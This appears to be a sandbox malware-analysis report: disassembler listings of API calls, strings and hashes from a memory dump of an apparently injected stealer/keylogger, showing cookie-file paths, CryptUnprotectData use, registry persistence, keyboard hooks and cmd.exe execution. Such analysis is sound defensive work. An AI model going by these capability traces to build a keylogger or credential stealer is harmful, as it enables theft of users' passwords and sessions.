                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 00452EBF
                                                                                                                                                                                                  • __freea.LIBCMT ref: 00452EC8
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharMultiWide__alloca_probe_16__freea
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 3062693170-2084328917
                                                                                                                                                                                                  • Opcode ID: 571e35960802651425c405c60af804956b57107d641c5bd2d20fb3eb238341ad
                                                                                                                                                                                                  • Instruction ID: 547a5762545d9e1961a78ac081f297de34cc2a53ea43b9f31110d22f3e4d4f85
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 571e35960802651425c405c60af804956b57107d641c5bd2d20fb3eb238341ad
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81312532A00156ABDB249FA5CD42CAF7BA4EB45715F08466AFC14EB282DB38CC44C794
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                                                                                                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63841986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                                                                                                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                                                                                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                                                                                                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                                                                                  • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                                                                  • String ID: /sort "Visit Time" /stext "$0NG
                                                                                                                                                                                                  • API String ID: 368326130-3219657780
                                                                                                                                                                                                  • Opcode ID: 87d770fe459356d938983b865b1cd302a3835d7c71cdc7891b93df328c2921e7
                                                                                                                                                                                                  • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87d770fe459356d938983b865b1cd302a3835d7c71cdc7891b93df328c2921e7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
APIs
• _free.LIBCMT ref: 004495B3
• _free.LIBCMT ref: 00449609
  • Part of subcall function 004493E5: _free.LIBCMT ref: 0044943D
  • Part of subcall function 004493E5: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
  • Part of subcall function 004493E5: WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
  • Part of subcall function 004493E5: WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: _free$ByteCharMultiWide$InformationTimeZone
• String ID: t'`/
• API String ID: 314583886-2084328917
• Opcode ID: 7819fab580251a6413c46e3f0ee07f889e2528e1cdd5ac1c69f544e85ace0940
• Instruction ID: da5c51787f9f1a1f19b75189942e14dcbf4476fdba08df6e704f400b95fb1742
• Opcode Fuzzy Hash: 7819fab580251a6413c46e3f0ee07f889e2528e1cdd5ac1c69f544e85ace0940
• Instruction Fuzzy Hash: 6D21517380011577FF31B7259C81DEB7368DB45724F21029BF898A3181EB784EC19A9D
APIs
• _wcslen.LIBCMT ref: 00416330
  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
  • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
  • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
  • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: _wcslen$CloseCreateValue
• String ID: !D@$okmode$PG
• API String ID: 3411444782-3370592832
• Opcode ID: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
• Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
• Opcode Fuzzy Hash: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
• Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
APIs
  • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
• PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
• PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
Strings
• User Data\Profile ?\Network\Cookies, xrefs: 0040C670
• User Data\Default\Network\Cookies, xrefs: 0040C63E
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ExistsFilePath
• String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
• API String ID: 1174141254-1980882731
• Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
• Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
• Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
• Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
APIs
  • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
• PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
• PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
Strings
• User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
• User Data\Default\Network\Cookies, xrefs: 0040C70D
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ExistsFilePath
• String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
• API String ID: 1174141254-1980882731
• Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
• Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
• Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
• Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
APIs
• GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
• wsprintfW.USER32 ref: 0040B22E
  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: EventLocalTimewsprintf
• String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
• API String ID: 1497725170-1359877963
• Opcode ID: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
• Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
• Opcode Fuzzy Hash: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
• Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
APIs
  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
• CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
• CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CreateThread$LocalTime$wsprintf
• String ID: Online Keylogger Started
• API String ID: 112202259-1258561607
• Opcode ID: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
• Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
• Opcode Fuzzy Hash: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
• Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                  • String ID: CryptUnprotectData$crypt32
                                                                                                                                                                                                  • API String ID: 2574300362-2380590389
                                                                                                                                                                                                  • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                                                                                                                                  • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                                                                                                                                  • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseEventHandleObjectSingleWait
                                                                                                                                                                                                  • String ID: Connection Timeout
                                                                                                                                                                                                  • API String ID: 2055531096-499159329
                                                                                                                                                                                                  • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                                                                                                                                  • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                  • API String ID: 2005118841-1866435925
                                                                                                                                                                                                  • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                                                                                                                                  • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041385A
                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32 ref: 00413888
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(004752D8), ref: 00413893
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateValue
                                                                                                                                                                                                  • String ID: pth_unenc
                                                                                                                                                                                                  • API String ID: 1818849710-4028850238
                                                                                                                                                                                                  • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                                                                                                                                  • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                                                                                                                                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                                                                                                                                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                                                  • API String ID: 3628047217-1405518554
                                                                                                                                                                                                  • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                                                                                                                                  • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FreeHandleLibraryModule
                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                  • API String ID: 662261464-1276376045
                                                                                                                                                                                                  • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                                                  • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LocaleValid
                                                                                                                                                                                                  • String ID: IsValidLocaleName$kKD$t'`/
                                                                                                                                                                                                  • API String ID: 1901932003-3261428104
                                                                                                                                                                                                  • Opcode ID: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                                                                                                                                                                  • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                                                                                                                                                  • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                                                                                                                                                  • SetForegroundWindow.USER32 ref: 00416CA8
                                                                                                                                                                                                    • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
                                                                                                                                                                                                    • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                                                                                                                                    • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                                                                                                                    • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                                                                                                                                                                  • String ID: !D@
                                                                                                                                                                                                  • API String ID: 186401046-604454484
                                                                                                                                                                                                  • Opcode ID: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                                                                                                                                                                                                  • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                                                                                                                                                                                                  • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExecuteShell
                                                                                                                                                                                                  • String ID: /C $cmd.exe$open
                                                                                                                                                                                                  • API String ID: 587946157-3896048727
                                                                                                                                                                                                  • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                                                                                                                                  • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                                                                                                                                  • UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                                                                                                                  • TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: TerminateThread$HookUnhookWindows
                                                                                                                                                                                                  • String ID: pth_unenc
